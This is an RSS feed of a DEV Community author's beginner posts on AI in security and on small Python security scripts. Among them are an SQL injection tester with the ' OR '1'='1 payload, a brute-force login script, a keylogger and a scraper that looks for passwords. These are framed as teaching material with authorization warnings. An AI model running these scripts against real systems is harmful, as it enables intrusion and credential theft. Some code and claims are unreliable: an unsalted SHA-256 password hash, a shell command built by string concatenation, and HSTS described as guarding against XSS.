<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mohana Vamsi</title>
    <description>The latest articles on DEV Community by Mohana Vamsi (@mohanavamsi0614).</description>
    <link>https://dev.to/mohanavamsi0614</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1450389%2F62c78133-4f4f-4194-a212-3d71fe2b59fd.jpeg</url>
      <title>DEV Community: Mohana Vamsi</title>
      <link>https://dev.to/mohanavamsi0614</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mohanavamsi0614"/>
    <language>en</language>
    <item>
      <title>Artificial Intelligence and Ethical Hacking</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:18:50 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/artificial-intelligence-and-ethical-hacking-4d8i</link>
      <guid>https://dev.to/mohanavamsi0614/artificial-intelligence-and-ethical-hacking-4d8i</guid>
      <description>&lt;p&gt;AI brings into ethical hacking a complete automation of vulnerability scanning and penetration testing.&lt;/p&gt;

&lt;p&gt;Example:&lt;br&gt;
Astra Pentest is an AI-based tool that uses artificial intelligence to launch simulated attacks at a speed faster than conventional methods and searches for weak points.&lt;/p&gt;

&lt;p&gt;Real-World Scenario:&lt;br&gt;
An artificial intelligence tool, which took only minutes, uncovered SQL injection weaknesses in a finance app during a cyber assessment; this, saved weeks of work that manual effort would have taken.&lt;/p&gt;

&lt;p&gt;Limitations:&lt;br&gt;
Because AI lacks creativity, it may not cover all non-conventional vectors of threat; hence, human ethical hackers are also needed.&lt;/p&gt;

&lt;p&gt;The combination of AI and human effort will go a long way toward making security very resilient in any organization.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>AI in Fighting Phishing</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:16:08 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/ai-in-fighting-phishing-3703</link>
      <guid>https://dev.to/mohanavamsi0614/ai-in-fighting-phishing-3703</guid>
      <description>&lt;p&gt;Phishing is an attack that is usually aimed at manipulating users into giving away sensitive information. AI plays an active role in countering these scams.&lt;/p&gt;

&lt;p&gt;How AI helps:&lt;/p&gt;

&lt;p&gt;Email Filtering: A machine learning model can identify a phishing email by tracing suspicious patterns and links and even sender behavior.&lt;br&gt;
Real-time alerts: Phishing warning from an AI-powered browser alerting a user browsing a known phishing site is based on the real-time threat database.&lt;br&gt;
Example:&lt;br&gt;
For example, Gmail from Google uses AI on their backend to block nearly 99.9% visiting phishing emails.&lt;/p&gt;

&lt;p&gt;But now the attackers have come up with another method with the aid of AI, which personalizes phishing emails to an extent that they can be difficult to detect. For instance, they can generate extremely sophisticated emails based on social media profiles, making detection almost impossible.&lt;/p&gt;

&lt;p&gt;Take Away: While AI makes defenses more robust against phishing attacks, the human element of vigilance cannot be overemphasized. Don't click on links or attachments from untrustworthy sources!&lt;/p&gt;

</description>
    </item>
    <item>
      <title>AI in Cybersecurity - The Double-Edged Sword</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:13:56 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/ai-in-cybersecurity-the-double-edged-sword-3d88</link>
      <guid>https://dev.to/mohanavamsi0614/ai-in-cybersecurity-the-double-edged-sword-3d88</guid>
      <description>&lt;p&gt;Despite revolutionizing cybersecurity, artificial inteligence is not entirely free of challenges. One set of problems arises from the fact that, on the one hand, it helps people accelerate their searches for threats by sifting through huge datasets and identifying anomalies in behavior, while, on the other hand, it enables attackers to innovate more intelligent versions of their malware and phishing threats.&lt;/p&gt;

&lt;p&gt;Positive Effects:&lt;/p&gt;

&lt;p&gt;Threat Detection: AI in SIEM systems, for example, can easily detect any unusual behavior using machine learning, thus flagging possible threats in real time.&lt;br&gt;
Predictive Analytics: AI can forecast the probable vulnerabilities and attacks that might occur based on past events.&lt;br&gt;
Automation: Reduces manual workload through automation of repetitive tasks, such as log analysis.&lt;br&gt;
Negative Impact:&lt;/p&gt;

&lt;p&gt;AI-Based Attacks: Various social engineering attacks using deepfake generators and automated phishing kits create more believable attacks.&lt;br&gt;
Bias and False Positives: Ill-trained AI causes false alarms or may even fail to alert about serious threats.&lt;br&gt;
This is the support that AI gives to security; however, as defenders innovate, so do attackers. Finding the right balance between these two is very important to ensure that a safer digital future is possible.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Password Hashing in Python</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:12:32 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/password-hashing-in-python-29eh</link>
      <guid>https://dev.to/mohanavamsi0614/password-hashing-in-python-29eh</guid>
      <description>&lt;p&gt;One must never store passwords plainly. Let's learn the technique of hashing passwords securely using Python:&lt;/p&gt;

&lt;p&gt;import hashlib  &lt;/p&gt;

&lt;p&gt;password = "securepassword"&lt;br&gt;&lt;br&gt;
hashed = hashlib.sha256(password.encode()).hexdigest()&lt;br&gt;&lt;br&gt;
print(f"Hashed password: {hashed}")&lt;br&gt;&lt;br&gt;
Hashing means that even if someone manages to break into the database, they will not get to know what the plaintext passwords are. Now, most modern systems use advanced algorithms like bcrypt, which also include salting.&lt;/p&gt;

&lt;p&gt;Pro tip: Never ever roll out your own cryptographic stuff; it will lead you nowhere. Just use proven libraries like bcrypt or argon2. &lt;/p&gt;

&lt;p&gt;This builds trust and makes the user secure.&lt;/p&gt;

</description>
      <category>python</category>
      <category>security</category>
      <category>learning</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Two-Factor Authentication System</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:08:20 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/two-factor-authentication-system-5f6</link>
      <guid>https://dev.to/mohanavamsi0614/two-factor-authentication-system-5f6</guid>
      <description>&lt;p&gt;This project implements a basic TOTP (Time-Based One-Time Password) generator using Python's pyotp library.&lt;/p&gt;

&lt;p&gt;Code Example:&lt;/p&gt;

&lt;p&gt;import pyotp&lt;br&gt;&lt;br&gt;
import time  &lt;/p&gt;

&lt;p&gt;key = pyotp.random_base32()&lt;br&gt;&lt;br&gt;
totp = pyotp.TOTP(key)  &lt;/p&gt;

&lt;p&gt;print("Generated OTP:", totp.now())&lt;br&gt;&lt;br&gt;
time.sleep(30)&lt;br&gt;&lt;br&gt;
print("Next OTP:", totp.now())&lt;br&gt;&lt;br&gt;
Use Case: Useful for understanding the workings of two-factor authentication and how time-based codes are generated.&lt;/p&gt;

&lt;p&gt;Tip: Integrate this with a login system to simulate 2FA in action.&lt;/p&gt;

</description>
      <category>security</category>
      <category>python</category>
      <category>learning</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Basic Network Scanner</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:06:44 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/basic-network-scanner-2kj1</link>
      <guid>https://dev.to/mohanavamsi0614/basic-network-scanner-2kj1</guid>
      <description>&lt;p&gt;This script written with Python scans the local network for identifying active devices. Useful for network monitoring to check the unapproved device on your network.&lt;/p&gt;

&lt;p&gt;Code Example: &lt;/p&gt;

&lt;p&gt;import os  &lt;/p&gt;

&lt;p&gt;def scan_network(network):&lt;br&gt;&lt;br&gt;
    print("Scanning network : " + network)&lt;br&gt;&lt;br&gt;
    response = os.popen("ping -c 1 " + network).read()&lt;br&gt;&lt;br&gt;
    if response.find('1 packets transmitted, 1 received') &amp;gt;= 0:&lt;br&gt;&lt;br&gt;
        print("The network is online-" + network)&lt;br&gt;&lt;br&gt;
    else:&lt;br&gt;&lt;br&gt;
        print("The network is offline-" + network)  &lt;/p&gt;

&lt;p&gt;for i in range(1, 255):&lt;br&gt;&lt;br&gt;
    scan_network("192.168.1." + str(i));&lt;br&gt;&lt;br&gt;
Use Case: This can be used further in the audit of networks to identify unauthorized devices that may have connected to your system.&lt;/p&gt;

&lt;p&gt;Tip: You can modify the script to scan your entire subnet and produce an inventory of devices connected to your network.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>SQL Injection Tester</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:04:45 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/sql-injection-tester-1ak7</link>
      <guid>https://dev.to/mohanavamsi0614/sql-injection-tester-1ak7</guid>
      <description>&lt;p&gt;The purpose of this project is to demonstrate how SQL injection works. This malicious functionality sends SQL queries to a vulnerable web application for testing the injection susceptibility.&lt;/p&gt;

&lt;p&gt;Code Example:&lt;/p&gt;

&lt;p&gt;import requests  &lt;/p&gt;

&lt;p&gt;def test_sql_injection(url):&lt;br&gt;&lt;br&gt;
    payload = "' OR '1'='1"&lt;br&gt;&lt;br&gt;
    response = requests.get(url, params={'id': payload})&lt;br&gt;&lt;br&gt;
    if "Welcome" in response.text:&lt;br&gt;&lt;br&gt;
        print("Vulnerable to SQL Injection")&lt;br&gt;&lt;br&gt;
    else:&lt;br&gt;&lt;br&gt;
        print("Safe")  &lt;/p&gt;

&lt;p&gt;url = "&lt;a href="http://example.com/product?id=" rel="noopener noreferrer"&gt;http://example.com/product?id=&lt;/a&gt;"&lt;br&gt;&lt;br&gt;
test_sql_injection(url)&lt;br&gt;&lt;br&gt;
Use Case: This is a script that tests web applications against SQL injection vulnerabilities and shows how adversaries generally manipulate databases.&lt;/p&gt;

&lt;p&gt;Tip: Make sure to always sanitize all user inputs into the web applications against SQL injection attacks.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Brute Force Web Login Tester</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:03:27 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/brute-force-web-login-tester-hne</link>
      <guid>https://dev.to/mohanavamsi0614/brute-force-web-login-tester-hne</guid>
      <description>&lt;p&gt;This tool helps to brute force a web form by trying different combinations of username and passwords. This is particularly useful to security testers to find out bad credentials.&lt;/p&gt;

&lt;p&gt;Code Example:&lt;/p&gt;

&lt;p&gt;import requests  &lt;/p&gt;

&lt;p&gt;def brute_force_login(url, usernames, passwords):&lt;br&gt;&lt;br&gt;
    for username in usernames:&lt;br&gt;&lt;br&gt;
        for password in passwords:&lt;br&gt;&lt;br&gt;
            response = requests.post(url, data={'username': username, 'password': password})&lt;br&gt;&lt;br&gt;
            if "Login successful" in response.text:&lt;br&gt;&lt;br&gt;
                print(f"Found: {username}:{password}")&lt;br&gt;&lt;br&gt;
                return&lt;br&gt;&lt;br&gt;
    print("No valid credentials found.")  &lt;/p&gt;

&lt;p&gt;url="&lt;a href="http://example.com/login" rel="noopener noreferrer"&gt;http://example.com/login&lt;/a&gt;"&lt;br&gt;&lt;br&gt;
usernames=["admin","user","guest"]&lt;br&gt;&lt;br&gt;
passwords=["1234","password","admin123"]&lt;br&gt;&lt;br&gt;
brute_force_login(url,usernames,passwords)&lt;br&gt;&lt;br&gt;
Use Case: This can be the primary objective in penetration testing to get weak logon credentials and show the dismal results of poor password policies.&lt;/p&gt;

&lt;p&gt;Tip: Never use this on unauthorized websites.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Simple Wap Scraper for Sensitive Information</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 16:01:57 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/simple-wap-scraper-for-sensitive-information-3bek</link>
      <guid>https://dev.to/mohanavamsi0614/simple-wap-scraper-for-sensitive-information-3bek</guid>
      <description>&lt;p&gt;This python project will show how web scrapers can be designed for grabbing sensitive information from public websites. The script, in short, looks for keywords relevant to personal information.&lt;/p&gt;

&lt;p&gt;Example Code:&lt;/p&gt;

&lt;p&gt;import requests&lt;br&gt;&lt;br&gt;
from bs4 import BeautifulSoup  &lt;/p&gt;

&lt;p&gt;def scrape_sensitive_data(url):&lt;br&gt;&lt;br&gt;
    response = requests.get(url)&lt;br&gt;&lt;br&gt;
    soup = BeautifulSoup(response.text, 'html.parser')&lt;br&gt;&lt;br&gt;
    for element in soup.find_all(text=True):&lt;br&gt;&lt;br&gt;
        if "password" in element.lower():&lt;br&gt;&lt;br&gt;
            print(f"Sensitive data found: {element.strip()}")  &lt;/p&gt;

&lt;p&gt;url=input("Enter URL to scrape: ")&lt;br&gt;&lt;br&gt;
scrape_sensitive_data(url)&lt;br&gt;&lt;br&gt;
Use Case: this script could be used for penetration testing website security for sensitive information exposure such as passwords or emails.&lt;/p&gt;

&lt;p&gt;Note: Scraping has legal implications, so always ask permission from the website owners.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Keylogger</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sun, 15 Dec 2024 15:59:52 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/keylogger-2jc6</link>
      <guid>https://dev.to/mohanavamsi0614/keylogger-2jc6</guid>
      <description>&lt;p&gt;A keylogger records keystrokes and stores them in a log file. This project is for demonstration purposes to show how malefactors use keyloggers to steal data.&lt;/p&gt;

&lt;p&gt;Code Example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pynput.keyboard  

def on_press(key):  
    try:  
        with open("log.txt", "a") as log:  
            log.write(f"{key.char}")  
    except AttributeError:  
        pass  

listener = pynput.keyboard.Listener(on_press=on_press)  
listener.start()  
listener.join()

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Use Case: Learn how keyloggers work, but of course use it responsibly and in controlled, authorized environments only.&lt;/p&gt;

&lt;p&gt;Tip: Always get consent from users before running any keylogging software.&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>HTTP Request Header Analyzer</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sat, 14 Dec 2024 17:27:06 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/http-request-header-analyzer-1bcb</link>
      <guid>https://dev.to/mohanavamsi0614/http-request-header-analyzer-1bcb</guid>
      <description>&lt;p&gt;This is a project mainly focused on to analyzes HTTP headers to detect potential security issues in web applications, like missing security headers or improper configurations.&lt;/p&gt;

&lt;p&gt;code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import requests  

def analyze_headers(url):  
    response = requests.get(url)  
    headers = response.headers  
    for header, value in headers.items():  
        print(f"{header}: {value}")  

url = input("Enter URL to analyze: ")  
analyze_headers(url)  

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Use Case: This script is useful for web security . You can analyze if a website has security headers like Strict-Transport-Security or X-Content-Type-Options, which protect against common attacks such as cross-site scripting (XSS).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tip: Missing or improperly configured headers can indicate vulnerabilities, and this script helps you quickly identify them.&lt;/strong&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Network Packet Sniffer</title>
      <dc:creator>Mohana Vamsi</dc:creator>
      <pubDate>Sat, 14 Dec 2024 17:20:00 +0000</pubDate>
      <link>https://dev.to/mohanavamsi0614/network-packet-sniffer-50n</link>
      <guid>https://dev.to/mohanavamsi0614/network-packet-sniffer-50n</guid>
      <description>&lt;p&gt;This tool is used in capturing packets from a network and display summary of the captured packets with the view being used in analyzing the traffic in a network. It uses scapy library which is very efficient for packet manipulation on wire.&lt;/p&gt;

&lt;p&gt;Code Example:&lt;/p&gt;

&lt;p&gt;from scapy.all import sniff  &lt;/p&gt;

&lt;p&gt;def packet_callback(packet):&lt;br&gt;&lt;br&gt;
    print(packet.summary())  &lt;/p&gt;

&lt;p&gt;It’s worth to sniff(prn=packet_callback, count=10)&lt;br&gt;&lt;br&gt;
Use Case: This project is also suitable for carrying out the monitoring of the network as well as identifying any malicious activity. It assists security experts to monitor network data and detect threats like man in the middle or data leakage.&lt;/p&gt;

&lt;p&gt;Tip: This tool should be used only on networks that you control or have direct permission to scan because is improper to scan traffic of other networks as that is considered a crime.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
